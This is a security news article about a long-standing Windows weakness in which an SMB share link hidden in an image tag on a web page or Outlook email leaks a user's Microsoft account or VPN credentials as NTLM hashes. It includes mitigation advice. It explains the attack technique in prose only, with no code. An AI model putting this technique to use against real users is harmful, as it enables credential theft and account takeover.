14 DAY TRIAL // A flaw in how Windows handles old authentication procedures for shared network resources can leak a user's Microsoft account username and password or VPN credentials if the victim is using a VPN to surf the Internet.
The exploit relies on an attacker embedding a link to an SMB resource (network share) inside a Web page or an email that gets viewed via Outlook.
The attacker can disguise the link to his network share inside image tags, but instead of the proper image link, they can place the link to a network share hosted on his own network.
Attack works via IE, Edge, or Outlook
When a user accesses the link via Internet Explorer, Edge, or Outlook, because of the way Windows handles authentication for network shares, their computer will automatically send their login credentials to authenticate on the crook's domain, even via the Internet.
While the Microsoft account password is not leaked in cleartext, but as an NTLM hash, researchers proved a long time ago that these hashes could be easily cracked.
This isn't even something new, since Microsoft and the researcher community have known about this issue since 1997 and often discussed it at security conferences such as Black Hat.
Attack can indirectly leak data for many other Microsoft resources
While this wasn't a problem in the past since Windows accounts were using machine-localized usernames and passwords, beginning with Windows 8 and onward, Microsoft started to allow users to authenticate on their computers with Microsoft accounts. In Windows 10, this became the de-facto standard authentication method, meaning more users started using it.
In recent years, Microsoft started linking all its online realties with the user's same Microsoft account. According to ValdikSS from ProstoVPN, this old attack now has new claws, allowing a crook to get their hands on credentials for Microsoft accounts that will indirectly also grant them access to all sorts of services like Skype, Xbox, OneDrive, Office 360, MSN, Bing, Azure, and more.
Even worse, if the user is utilizing a VPN connection to load the corrupt SMB resource, then their VPN credentials get leaked instead, allowing the crook to access the victim's VPN account.
Issue at the core of the problem not fixed after 19 years
"Microsoft successfully fixed some issues, some other issues were half-fixed, and another ones are not fixed at all and could be exploited up to this day," ValdikSS explains. "The problem of transmitting account credentials to the SMB server over the internet is one of the not fixed ones."
ValdikSS says the easiest way to protect oneself against such attacks is by blocking all outgoing SMB connections (port 445) via the Windows firewall, except for local networks.
But the best defense against this attack is not to use your Microsoft account to log into your Windows PC.
